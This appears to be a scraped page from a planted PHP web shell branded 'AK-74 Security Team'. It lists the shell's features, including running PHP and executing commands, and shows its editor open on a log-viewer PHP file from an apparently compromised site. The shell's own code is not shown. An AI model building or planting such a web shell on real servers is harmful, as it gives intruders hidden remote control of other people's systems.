.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<? session_start(); include ('../init.php'); include ('fn_common.php'); checkUserSession(); checkUserCPanelPrivileges(); header('Content-Type:text/plain'); $filename = basename(realpath($gsValues['PATH_ROOT'].'logs/'.$_GET['log'])); $path = $gsValues['PATH_ROOT'].'logs/'.$filename; if (file_exists($path)) { $ext = pathinfo($path, PATHINFO_EXTENSION); if ($ext == 'log') { echo file_get_contents($path); } } ?>
Rename:
-